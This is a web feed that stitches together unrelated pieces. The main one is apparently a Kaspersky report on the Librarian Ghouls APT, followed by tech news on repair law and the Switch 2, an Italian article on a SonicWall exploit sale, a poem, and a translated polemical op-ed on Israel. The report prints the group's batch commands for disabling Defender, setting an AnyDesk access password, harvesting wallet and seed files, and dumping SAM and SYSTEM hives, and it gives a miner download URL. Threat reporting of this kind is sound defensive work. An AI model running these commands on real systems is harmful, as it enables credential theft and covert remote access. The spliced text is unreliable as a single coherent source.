Introduction

Librarian Ghouls, also known as “Rare Werewolf” and “Rezet”, is an APT group that targets entities in Russia and the CIS. Other security vendors are also monitoring this APT and releasing analyses of its campaigns. The group has remained active through May 2025, consistently targeting Russian companies.

A distinctive feature of this threat is that the attackers favor using legitimate third-party software over developing their own malicious binaries. The malicious functionality of the campaign described in this article is implemented through command files and PowerShell scripts. The attackers establish remote access to the victim’s device, steal credentials, and deploy an XMRig crypto miner in the system.

Our research has uncovered new tools within this APT group’s arsenal, which we will elaborate on in this article.

Technical details

Initial infection vector

Attacks by Librarian Ghouls continued almost unabated throughout 2024. We observed a slight decline in the group’s activity in December, followed immediately by a new wave of attacks, which is ongoing. The group’s primary initial infection vector involves targeted phishing emails that contain password-protected archives with executable files inside. These malicious emails are typically disguised as messages from legitimate organizations, containing attachments that appear to be official documents. The infection process is as follows: the victim opens the attached archive (the password is usually provided in the email body), extracts the files inside, and opens them.

We managed to get hold of a malicious implant from an archive disguised as a payment order. The sample is a self-extracting installer made with the Smart Install Maker utility for Windows.

The installer contains three files: an archive, a configuration file, and an empty file irrelevant for our analysis. They are later renamed into data.cab, installer.config and runtime.cab respectively.

The primary malicious logic resides in the installer’s configuration file. It uses a variety of registry modification commands to automatically deploy the legitimate window manager, 4t Tray Minimizer, onto the system. This software can minimize running applications to the system tray, allowing attackers to obscure their presence on the compromised system.

Once 4t Tray Minimizer is installed, the installer pulls three files from data.cab and puts them into the C:\Intel directory, specifically at:

The PDF decoy resembles an order to pay a minor amount:

PDF document imitating a payment order

rezet.cmd

Once data.cab is unpacked, the installer generates and executes a rezet.cmd command file, which then reaches out to the C2 server downdown[.]ru, hosting six files with the JPG extension. rezet.cmd downloads these to C:\Intel, changing their file extensions to: driver.exe, blat.exe, svchost.exe, Trays.rar, wol.ps1, and dc.exe.

• driver.exe is a customized build of rar.exe, the console version of WinRAR 3.80. This version has had user dialog strings removed: it can execute commands but provides no meaningful output to the console.
• blat.exe is Blat, a legitimate utility for sending email messages and files via SMTP. Attackers use this to send data they steal to an email server they control.
• svchost.exe is the remote access application AnyDesk. Attackers use this to remotely control the compromised machine.
• dc.exe is Defender Control, which allows disabling Windows Defender.

After downloading the files, the script uses the specified password and the driver.exe console utility to extract Trays.rar into the same C:\Intel directory and run the unpacked Trays.lnk. This shortcut allows starting 4t Tray Minimizer minimized to the tray.

Next, the script installs AnyDesk on the compromised device and downloads a bat.bat file from the C2 server to C:\Intel\AnyDesk. Finally, rezet.cmd runs bat.lnk, which was previously extracted from data.cab.

bat.bat

Opening the bat.lnk shortcut runs the bat.bat batch file, which executes a series of malicious actions.

Disabling security measures and a scheduled task

First, the BAT file sets the password QWERTY1234566 for AnyDesk, which allows the attackers to connect to the victim’s device without asking for confirmation.

Next, the script uses the previously downloaded Defender Control (dc.exe) application to disable Windows Defender.

To verify that the victim’s computer is on and available for remote connections, the batch file runs the powercfg utility six times with different parameters. This utility controls the local machine’s power settings.

Next, bat.bat runs the schtasks utility to create a ShutdownAt5AM scheduler task, which shuts down the victim’s PC every day at 5 AM as the name suggests. It is our assessment that the attackers use this technique to cover their tracks so that the user remains unaware that their device has been hijacked.
echo QWERTY1234566 | AnyDesk.exe --set-password _unattended_access
%SYSTEMDRIVE%\Intel\dc.exe /D
powercfg -setacvalueindex SCHEME_CURRENT 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 0
powercfg -change -standby-timeout-ac 0
powercfg -change -hibernate-timeout-ac 0
powercfg -h off
powercfg /SETDCVALUEINDEX SCHEME_CURRENT 238c9fa8-0aad-41ed-83f4-97be242c8f20 bd3b718a-0680-4d9d-8ab2-e1d2b4ac806d 1
powercfg /SETACVALUEINDEX SCHEME_CURRENT 238c9fa8-0aad-41ed-83f4-97be242c8f20 bd3b718a-0680-4d9d-8ab2-e1d2b4ac806d 1
schtasks /create /tn "ShutdownAt5AM" /tr "shutdown /s /f /t 0" /sc daily /st 05:00

Disabling security measures and the power management configuration in bat.bat

Wakeup script and data theft

Next, the batch file executes the wol.ps1 script via PowerShell.
$Action = New-ScheduledTaskAction -Execute "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
$Trigger = New-ScheduledTaskTrigger -Daily -At "01:00AM"
$Principal = New-ScheduledTaskPrincipal -UserId "SYSTEM" -LogonType ServiceAccount -RunLevel Highest
# Creating task settings
$TaskSettings = New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -StartWhenAvailable -WakeToRun
# Registering task in Task Scheduler
Register-ScheduledTask -Action $Action -Principal $Principal -Trigger $Trigger -TaskName "WakeUpAndLaunchEdge" -Settings $TaskSettings -Force

Contents of the “wol.ps1” script

This script launches Microsoft Edge every day at 1 AM. We found no evidence of msedge.exe being replaced or compromised, leading us to believe it is a genuine Microsoft Edge executable. This daily browser activation wakes the victim’s computer, giving attackers a four-hour window to establish unauthorized remote access with AnyDesk before the scheduled task shuts the machine down at 5 AM.

Following the execution of the PowerShell script, bat.bat removes the curl utility, the Trays.rar archive, and the AnyDesk installer. The attackers no longer need these components: at this stage of the infection, all necessary malicious files and third-party utilities have been downloaded with curl, Trays.rar has been unpacked, and AnyDesk has been installed on the device.

After that, the batch file sets environment variables for Blat. These variables contain, among other things, the email addresses where the victim’s data will be sent and the passwords for these accounts.

The next step is to collect information stored on the device that is of interest to the attackers:

• Cryptocurrency wallet credentials and seed phrases
• Dumps of the HKLM\SAM and HKLM\SYSTEM registry keys made with reg.exe

%SYSTEMDRIVE%\Intel\driver.exe a -r -[REDACTED] %SYSTEMDRIVE%\Intel\wallet.rar C:\*парол*.* /y
%SYSTEMDRIVE%\Intel\driver.exe a -r -[REDACTED] %SYSTEMDRIVE%\Intel\wallet.rar C:\*карт*.* /y
%SYSTEMDRIVE%\Intel\driver.exe a -r -[REDACTED] %SYSTEMDRIVE%\Intel\wallet.rar C:\*кошельк*.* /y
%SYSTEMDRIVE%\Intel\driver.exe a -r -[REDACTED] %SYSTEMDRIVE%\Intel\wallet.rar C:\wallet.dat /y
%SYSTEMDRIVE%\Intel\driver.exe a -r -[REDACTED] %SYSTEMDRIVE%\Intel\wallet.rar C:\*wallet*.doc* /y
%SYSTEMDRIVE%\Intel\driver.exe a -r -[REDACTED] %SYSTEMDRIVE%\Intel\wallet.rar C:\*wallet*.txt /y
%SYSTEMDRIVE%\Intel\driver.exe a -r -[REDACTED] %SYSTEMDRIVE%\Intel\wallet.rar C:\*seed*.* /y
%SYSTEMDRIVE%\Intel\driver.exe a -r -[REDACTED] %SYSTEMDRIVE%\Intel\wallet.rar C:\keystore.json /y
%SYSTEMDRIVE%\Intel\driver.exe a -r -[REDACTED] %SYSTEMDRIVE%\Intel\wallet.rar C:\*bitcoin*.* /y
%SYSTEMDRIVE%\Intel\driver.exe a -r -[REDACTED] %SYSTEMDRIVE%\Intel\wallet.rar C:\*usdt*.* /y
%SYSTEMDRIVE%\Intel\driver.exe a -r -[REDACTED] %SYSTEMDRIVE%\Intel\wallet.rar C:\*ethereum*.* /y
reg save hklm\sam %SYSTEMDRIVE%\Intel\sam.backup
reg save hklm\system %SYSTEMDRIVE%\Intel\system.backup
Data collection by bat.bat

The BAT file uses driver.exe to pack data it has collected into two separate password-protected archives. Then, the script runs blat.exe to send the victim’s data and AnyDesk configuration files to the attackers via SMTP.

Miner installation and self-deletion

Next, bat.bat deletes the files generated during the attack from the C:\Intel\ folder and installs a crypto miner on the compromised system. To do this, the script creates a bm.json configuration file containing the mining pool address and the attackers’ identifier, and then downloads install.exe from hxxp://bmapps[.]org/bmcontrol/win64/Install.exe.

install.exe is an installer that checks for the JSON configuration file and the bmcontrol.exe process in the system. If the process is detected, the installer terminates it.

Then, install.exe downloads an archive with mining tools from hxxps://bmapps[.]org/bmcontrol/win64/app-1.4.zip.

The archive contains the following files:

• _install.exe: a new version of the installer. While the samples in the attacks we analyzed were identical, we suspect the attackers have a scenario for updating the malware.
• bmcontrol.exe: miner controller
• run.exe, stop.cmd, uninstall.cmd: tools for starting, stopping, and removing the controller
• XMRig miner

Depending on the parameters of the JSON file, the unmodified original installer file is used, or _install.exe is renamed to install.exe and run. After that, the installer adds run.exe to autorun. This utility checks for an already running bmcontrol.exe controller on the compromised system, and if it doesn’t find one, runs it from the downloaded archive.

Once running, bmcontrol.exe creates two processes: master and worker. The master process launches and constantly monitors the worker, and also restarts it if the latter quits unexpectedly. In addition, the master passes the JSON configuration file to the worker process.

Before launching the XMRig miner, the worker process collects the following system information:

1. Available CPU cores
2. Available RAM
3. GPU

This data is used to configure the miner on the compromised device and also sent to the attackers’ server. While XMRig is running, the worker maintains a connection to the mining pool, sending a request every 60 seconds.

After installing the miner on the system, bat.bat removes itself from the victim’s device.

Legitimate software utilized by the attackers

It is a common technique to leverage third-party legitimate software for malicious purposes (T1588.002), which makes detecting and attributing APT activity more difficult. We have seen this pattern in current campaigns by various APT groups, in particular in the Likho cluster.

Beyond the utilities discussed above, we also identified the following software in Librarian Ghouls attacks:

• Mipko Personal Monitor: a DLP system that the attackers use to monitor the victim. The application can collect screenshots and record keystrokes among other things.
• WebBrowserPassView: a password recovery utility that can extract passwords stored in web browsers. The attackers use this to steal victims’ credentials.
• ngrok: a global reverse proxy that secures and accelerates network services. Used by the attackers to connect to target machines.
• NirCmd: a legitimate utility that facilitates various OS tasks without a visible user interface. The attackers use this to covertly run scripts and executables.

Phishing campaign

Our investigation revealed several domains that we assess with low confidence to be associated with the ongoing Librarian Ghouls campaign. At the time of the investigation, some of them remained active, including users-mail[.]ru and deauthorization[.]online. These domains hosted phishing pages, generated with PHP scripts and designed to harvest credentials for the mail.ru email service.

Example of a phishing page associated with the APT campaign

Infrastructure

The implant detailed in this article communicated with the command-and-control servers downdown[.]ru and dragonfires[.]ru. Both resolve to the IP address 185.125.51[.]5.

Our analysis of the attackers’ infrastructure revealed a notable characteristic: several malicious web servers associated with this campaign had directory listing enabled, allowing us to inspect files they stored.

Directory listing on a malicious server

Victims

Our telemetry indicated that, during the investigation period, hundreds of Russian users fell victim to this campaign. It primarily focuses on industrial enterprises, with engineering schools also being a target of interest. Furthermore, the attacks described also impacted users in Belarus and Kazakhstan.

The phishing emails are notably composed in Russian and include archives with Russian filenames, along with Russian-language decoy documents. This suggests that the primary targets of this campaign are likely based in Russia or speak Russian.

About the attackers

Librarian Ghouls APT exhibits traits commonly associated with hacktivist groups, such as the use of self-extracting archives and a reliance on legitimate, third-party utilities rather than custom-built malware binary modules.

Since the beginning of the current campaign in December 2024, we have seen frequent updates to the implants, which vary in configuration files and the bundled sets of legitimate utilities. At the time of publishing this, our data encompassed over 100 malicious files connected to this campaign.

Takeaways

At the time of this report’s release, the Librarian Ghouls APT campaign described in it is still active, as evidenced by attacks we observed in May 2025. Consistent with previous activity, the attackers leverage third-party legitimate utilities rather than developing custom tools. All of the malicious functionality still relies on installer, command, and PowerShell scripts. We observe that the attackers are continuously refining their tactics, encompassing not only data exfiltration but also the deployment of remote access tools and the use of phishing sites for email account compromise. We constantly monitor this threat actor and will continue to share up-to-date information about its activity.

Indicators of compromise

* Additional indicators of compromise and a YARA rule for detecting Librarian Ghouls activity are available to customers of our APT Intelligence Reporting service. Contact intelreports@kaspersky.com for more details.

Implants

d8edd46220059541ff397f74bfd271336dda702c6b1869e8a081c71f595a9e68
2f3d67740bb7587ff70cc7319e9fe5c517c0e55345bf53e01b3019e415ff098b
de998bd26ea326e610cc70654499cebfd594cc973438ac421e4c7e1f3b887617
785a5b92bb8c9dbf52cfda1b28f0ac7db8ead4ec3a37cfd6470605d945ade40e
c79413ef4088b3a39fe8c7d68d2639cc69f88b10429e59dd0b4177f6b2a92351
53fd5984c4f6551b2c1059835ea9ca6d0342d886ba7034835db2a1dd3f8f5b04

Implant configuration files

f8c80bbecbfb38f252943ee6beec98edc93cd734ec70ccd2565ab1c4db5f072f
4d590a9640093bbda21597233b400b037278366660ba2c3128795bc85d35be72
1b409644e86559e56add5a65552785750cd36d60745afde448cce7f6f3f09a06
7c4a99382dbbd7b5aaa62af0ccff68aecdde2319560bbfdaf76132b0506ab68a
702bf51811281aad78e6ca767586eba4b4c3a43743f8b8e56bb93bc349cb6090
311ec9208f5fe3f22733fca1e6388ea9c0327be0836c955d2cf6a22317d4bdca

Malicious archive attachments

fd58900ea22b38bad2ef3d1b8b74f5c7023b8ca8a5b69f88cfbfe28b2c585baf
e6ea6ce923f2eee0cd56a0874e4a0ca467711b889553259a995df686bd35de86
6954eaed33a9d0cf7e298778ec82d31bfbdf40c813c6ac837352ce676793db74

Malicious BAT files

e880a1bb0e7d422b78a54b35b3f53e348ab27425f1c561db120c0411da5c1ce9
c353a708edfd0f77a486af66e407f7b78583394d7b5f994cd8d2e6e263d25968
636d4f1e3dcf0332a815ce3f526a02df3c4ef2890a74521d05d6050917596748
c5eeec72b5e6d0e84ff91dfdcbefbbbf441878780f887febb0caf3cbe882ec72
8bdb8df5677a11348f5787ece3c7c94824b83ab3f31f40e361e600576909b073
2af2841bf925ed1875faadcbb0ef316c641e1dcdb61d1fbf80c3443c2fc9454f

Decoy documents

cab1c4c675f1d996b659bab1ddb38af365190e450dec3d195461e4e4ccf1c286
dfac7cd8d041a53405cc37a44f100f6f862ed2d930e251f4bf22f10235db4bb3
977054802de7b583a38e0524feefa7356c47c53dd49de8c3d533e7689095f9ac
65f7c3e16598a8cb279b86eaeda32cb7a685801ed07d36c66ff83742d41cd415
a6ff418f0db461536cff41e9c7e5dba3ee3b405541519820db8a52b6d818a01e
6c86608893463968bfda0969aa1e6401411c0882662f3e70c1ac195ee7bd1510

Malicious PS1 scripts

8b6afbf73a9b98eec01d8510815a044cd036743b64fef955385cbca80ae94f15
7d6b598eaf19ea8a571b4bd79fd6ff7928388b565d7814b809d2f7fdedc23a0a
01793e6f0d5241b33f07a3f9ad34e40e056a514c5d23e14dc491cee60076dc5a

Miner installer (install.exe)
649ee35ad29945e8dd6511192483dddfdfe516a1312de5e0bd17fdd0a258c27f

Miner controller (bmcontrol.exe)
9cce3eaae0be9b196017cb6daf49dd56146016f936b66527320f754f179c615f

Miner launcher (run.exe)
d7bcab5acc8428026e1afd694fb179c5cbb74c5be651cd74e996c2914fb2b839

Legitimate software

AnyDesk
Blat
curl
Defender Control
Customized RAR 3.80
AnyDesk
Mipko Personal Monitor
ngrok
NirCmd
4t Tray Minimizer
WebBrowserPassView

Librarian Ghouls malicious domains

vniir[.]space
vniir[.]nl
hostingforme[.]nl
mail-cheker[.]nl
unifikator[.]ru
outinfo[.]ru
anyhostings[.]ru
center-mail[.]ru
redaction-voenmeh[.]info
acountservices[.]nl
accouts-verification[.]ru
office-email[.]ru
email-office[.]ru
email-informer[.]ru
office-account[.]ru
deauthorization[.]online
anyinfos[.]ru
verifikations[.]ru
claud-mail[.]ru
users-mail[.]ru
detectis[.]ru
supersuit[.]site
downdown[.]ru
dragonfires[.]ru
bmapps[.]org

securelist.com/librarian-ghoul…

IT'S MONDAY, AND THIS IS DIGITAL POLITICS. I'm Mark Scott, and will be making a flying visit to Brussels this week. If you're around and want to grab coffee on June 11, drop me a line here. My colleagues are holding a webinar on June 12 about the upcoming United Nations Internet Governance Forum. You watch along here at 9am ET / 3pm CET.

— We're entering a new era of digital competition enforcement that pits Big Tech companies' vested interests against each other.

— The traditional approach to tackling foreign interference is woefully out of date. It's time for a rethink.

— Europe's decade-long push to combat state-backed online disinformation and cyber attacks.

Let's get started:

digitalpolitics.co/newsletter0…

In what could be a big step forward for consumer rights, the Texas Senate recently unanimously voted to pass HB 2963, which references the “Diagnosis, maintenance, and repair of certain digital electronic equipment”. If signed by the governor, this would make Texas the ninth US state to enact such a law, and the seventh pertaining to consumer electronics. Interestingly, this bill saw anti-parts pairing language added, which is something that got stripped from the Oregon bill.

Much like other Right to Repair bills, HB 2963 would require manufacturers to make spare parts, documentation and repair tools available to both consumers and independent repair shops. If signed, the act would take effect in September of 2026. Included in the bill are provisions to prevent overcharging for the provided parts and documentation.

As for how useful this is going to be for consumers, [Louis Rossmann] had a read of the bill and gave his typically eloquent thoughts. The tl;dw is that while there is a lot of stuff to like, this bill leaves open potentially massive loopholes (e.g. assemblies vs parts), while also carving out massive exemptions, which leaves owners of game consoles, boats, cars, tractors, home appliances, etc. stranded with no new options.

youtube.com/embed/C_ohgeWKcOY?…

hackaday.com/2025/06/09/texas-…

A new console challenger has appeared, and it goes by the name Nintendo Switch 2. The company’s latest iteration of the home console portable hybrid initially showed promise by featuring a large 1080p display, though very little official footage of the handheld existed prior to the device’s global release last week. However, thanks to a teardown video from [TronicsFix], we’ve got a little more insight into the hardware.

The technical specifications of this new console have been speculated on for the last handful of years. We now know NVIDIA is again providing the main silicon in the form of a custom 8x ARM Cortex A78C processor. Keeping the system powered is a 5220 mAh lithium ion battery that according to [TronicsFix] is held in with some seriously strong adhesive.

On the plus side for repairability, the onboard microphone and headphone jack are each attached by their own ribbon cable to the motherboard. The magnetic controller interfaces are also modular in design as they may one day prove to be a point of failure from repeated detachment. Speaking of which, [TronicsFix] also took apart the new version of the Joy-Con controller that ships with the system.

Arguably the biggest pain point for owners of the original Nintendo Switch was the reliability of the analog sticks on the diminutive controllers. There were widespread reports of “stick drift” that caused players to lose control as onscreen avatars would lazily move in one direction without player input. For the Switch 2, the Joy-Con controllers feature roughly the same number of dome switch buttons as well as haptic feedback motors. The analog sticks are larger in size on the outside, but feature the same general wiper/resistor design of the original. Many will cry foul of the continued use of conventional analog stick design in favor of hall effect sensors, but only time will tell if the Nintendo Switch 2 will repeat history.

youtube.com/embed/TaNmhUKtgzs?…

hackaday.com/2025/06/09/ninten…

Un Threat actor noto con lo pseudonimo skart7 ha recentemente pubblicato sul forum underground chiuso Exploit un annuncio per la vendita di un exploit pre-auth RCE che colpisce i dispositivi SonicWall SRA 4600.

L’exploit consente l’esecuzione di codice arbitrario da remoto (RCE) senza autenticazione, rendendolo estremamente pericoloso per le organizzazioni che utilizzano questi dispositivi per l’accesso remoto.

Secondo quanto riportato nel post, l’exploit colpisce versioni firmware precedenti alla 9.0.0.10 o 10.2.0.7. Il venditore dichiara che l’exploit è completamente affidabile, compatibile con le configurazioni di default e non richiede alcuna interazione da parte dell’utente.

Questa vulnerabilità è coerente con quanto riportato nel bollettino ufficiale SonicWall relativo alla CVE-2025-2170, che descrive una falla critica nei dispositivi SMA1000 (di cui SRA 4600 è parte della stessa famiglia legacy). La vulnerabilità consente a un attaccante remoto non autenticato di eseguire comandi arbitrari sfruttando una debolezza nell’interfaccia di gestione.

• CVE: CVE-2025-2170
• CVSS: 9.8 (Critico)
• Tipo: Remote Code Execution (pre-auth)
• Dispositivi affetti: SonicWall SRA 4600, SMA1000
• Patch disponibile: Sì, tramite aggiornamento firmware

Il profilo dell’attore: skart7

L’utente skart7 non è nuovo alla scena underground. Nell’ultimo periodo ha pubblicato diversi exploit :

• SonicWall SRA 4600 – RCE pre-auth, root access, 60.000 USD
• TerraMaster NAS – RCE pre-auth, root access, compatibile con tutte le versioni 4.x e 5.x
• Cisco ISE – RCE pre-auth, root access, nessuna interazione richiesta

Tutti gli annunci condividono lo stesso TOX ID e sessione, suggerendo un singolo attore o gruppo ben strutturato. Le descrizioni sono tecnicamente dettagliate, e l’attore accetta transazioni tramite escrow del forum, una pratica che rafforza la sua reputazione come venditore affidabile nel contesto underground.

Le Tattiche, Tecniche e Procedure (TTPs) si basano sullo sfruttamento di vulnerabilità RCE pre-auth su dispositivi esposti pubblicamente. Raccomandiamo di applicare quanto prima le patch ufficiali SonicWall per i dispositivi SRA/SMA, i Firmware aggiornati sono disponibili sul portale ufficiale SonicWall. Isolare i dispositivi di accesso remoto dal resto della rete interna tramite segmentazione e implementare sistemi di IDS/IPS per rilevare attività anomale o tentativi di exploit. Inoltre, limitare l’accesso all’interfaccia di gestione solo da IP autorizzati.

La vendita di exploit RCE pre-auth da parte di attori come skart7 rappresenta una minaccia concreta e immediata. La combinazione di vulnerabilità critiche, dispositivi esposti e attori motivati economicamente crea un contesto ad alto rischio. Le organizzazioni devono agire proattivamente per mitigare queste minacce, aggiornando i sistemi e rafforzando le difese perimetrali.

L'articolo Exploit RCE per SonicWall SRA 4600 in vendita a 60.000 dollari: allarme sicurezza per CVE-2025-2170 proviene da il blog della sicurezza informatica.

Sono un fan dello storico Alessandro Barbero, avevo sottoscritto 2 suoi podcast ma ultimamente uno è finito (quello di Intesa S. Paolo) e l'altro rimanda sempre gli stessi da mesi e mesi.

Ce n'è anche un terzo ma è sponsorizzato e il volume dello sponsor è più alto del volume della conferenza, cosa che mi dà molto fastidio.

Avete qualche podcast da consigliarmi? Uso AntennaPod e non riesco a trovarne altri.

#Barbero

Hamas' leadership is leaning toward continuing its war with Israel to avert its own collapse, a Palestinian source familiar with the cease-fire negotiations in Qatar told Haaretz, adding that Hamas understands that it must choose whether to surrender or continue to fight at the price of hundreds, if not thousands, more Palestinian lives.

Quella povera gente è tra l'incudine e il martello.

La terra a noi si restringe
all’ultimo varco ci calca
e, al transito, ci spogliamo delle nostre membra
ci spreme la terra. Se solo fossimo il suo grano per morire e rivivere
se lei fosse nostra madre pietosa di noi
se solo noi fossimo immagini di rocce portate dal sogno come specchi.
Abbiamo visto i volti di chi verrà ucciso dall’ultimo tra noi nell’ultima difesa dell’anima.
Abbiamo pianto alla festa dei loro figli. Abbiamo visto
i volti di chi getterà i nostri figli dalle finestre di questo
ultimo spazio. Specchi levigati dalla nostra stella.
Dove mai andremo oltre il confine estremo?
Dove voleranno gli uccelli oltre l’ultimo cielo?
Dove riposeranno le piante oltre l’ultimo soffio di vita?
Scriveremo i nostri nomi nel vapore purpureo
recideremo le mani al canto perché la nostra carne lo completi.
Moriremo qui. Qui all’ultimo varco. Qui e qui il nostro
sangue pianterà il suo ulivo.

Mahmoud Darwish

"Dovrebbero avviare un'indagine formale sul suo status di immigrato, perché sono fermamente convinto che sia un immigrato illegale e dovrebbe essere espulso immediatamente dal Paese".

rainews.it/articoli/2025/06/ba…

CAITLIN JOHNSTONE - QUESTO È ISRAELE
4 giugno 2025

Questo è Israele. Ecco come appare il Progetto Sionista. I bambini morti. Gli ospedali distrutti. I civili disperati e affamati. Questo è tutto.

Non esiste una versione alternativa di Israele in cui queste cose non stiano accadendo. La visione Sionista liberale di una Soluzione a Due Stati e di un Israele giusto e pacifico esiste esclusivamente nell'immaginazione delle persone che la immaginano. Niente di simile è mai esistito. Tutto ciò che riguarda il moderno Stato di Israele è irremovibilmente ostile a questa visione.

O si sostiene l'esistenza dell'Israele che si vede davanti a sé, o si sostiene la fine dell'Apartheid Sionista. Non esiste una terza opzione alternativa. Non ci sono altre posizioni da considerare. Fingere il contrario significa vivere in una favola.

O vuoi bruciare vivi i bambini o non lo vuoi. O vuoi deliberatamente affamare i civili o non lo vuoi. O vuoi bombardare gli ospedali o non lo vuoi. O si vogliono deliberatamente assassinare giornalisti palestinesi mentre si vieta l'ingresso a Gaza ai giornalisti stranieri o non lo si vuole. O si vogliono Massacrare deliberatamente i civili e distruggere sistematicamente le infrastrutture civili per forzare l'espulsione dei palestinesi da un territorio palestinese o non lo si fa. E se sei contrario, devi opporti allo Stato di Israele.

Questo è Israele, lo Stato. Non solo Netanyahu. Non solo coloni estremisti. Non solo "elementi di estrema destra all'interno del governo israeliano". Israele stesso. Perché tutto ciò che stiamo vedendo fare a Israele è il risultato di tutto ciò che Israele è come Stato.

Tutto ciò che Israele sta facendo è il risultato di tutto ciò che è sempre stato. Non appena l'Occidente ha deciso di abbandonare uno Stato Colonialista in cima a una civiltà preesistente in cui i nuovi immigrati avrebbero ricevuto un trattamento preferenziale rispetto agli abitanti nativi che già vivevano lì, è diventato inevitabile che Israele sarebbe finito nelle condizioni in cui si trova oggi.

Perché non c'era modo di mantenere quello status quo senza sfollamenti di massa e tirannia, violenza e abusi senza sosta. Non c'era modo di creare una società a più livelli in cui un livello è posto al di sopra dell'altro senza indottrinare il popolo ad accettare quel sistema di Apartheid Disumanizzando sistematicamente i membri del gruppo privo di potere.

Stabilite uno status quo di Disumanizzazione di un gruppo di persone e fabbricate il consenso per la violenza e l'abuso contro di loro e, inevitabilmente, vi ritroverete con uno Stato di Apartheid di estrema destra che sta commettendo un Genocidio, così come sicuramente far cadere una pietra da un edificio provocherà la caduta di una pietra a terra.

Quello che stiamo vedendo oggi a Gaza è stato incluso nello Stato di Israele sin dal suo inizio.

Tutti quei bambini morti sul tuo flusso di notizie dei social media sono il frutto di un albero il cui seme è stato piantato dopo la Seconda Guerra Mondiale. Quell'albero ha dato sempre più frutti e continuerà a farlo finché rimarrà in piedi. Perché questo è proprio il tipo di albero che è. L'unico tipo di albero che avrebbe mai potuto essere.

Dire "Sostengo Israele ma non sostengo le azioni di Netanyahu a Gaza" è come dire "Mi piace questo albero di mele, ma solo quando germogliano noci di cocco invece di mele". Questo non è il tipo di albero che è. L'albero delle mele produrrà solo mele e l'albero del Genocidio produrrà solo il Genocidio.

I sostenitori di Israele evitano di confrontarsi con verità ovvie come queste. Il sostegno a Israele dipende da una compartimentazione psicologica su larga scala. Tutto ruota attorno all'evitare verità spiacevoli invece di fare i conti con esse in modo profondo e viscerale.

Distogliendo lo sguardo dalle riprese video delle atrocità di Israele a Gaza. Distogliendo lo sguardo dalle contraddizioni tra i valori che pretendono di sostenere e tutto ciò che Israele è come Stato. Distogliendo lo sguardo dalle montagne su montagne di prove che ci fissano tutti in faccia. Questo è l'unico modo in cui il sostegno a Israele può continuare.

Per diventare una specie guidata dalla verità, dobbiamo smettere di nasconderci dalle verità scomode. E uno dei nostri nascondigli preferiti per verità scomode a questo punto della storia è il moderno Stato di Israele, e il sostegno dell'Impero Occidentale ad esso.

________________________________
Traduzione: La Zona Grigia

Fonte:
caitlinjohnst.one/p/this-is-is…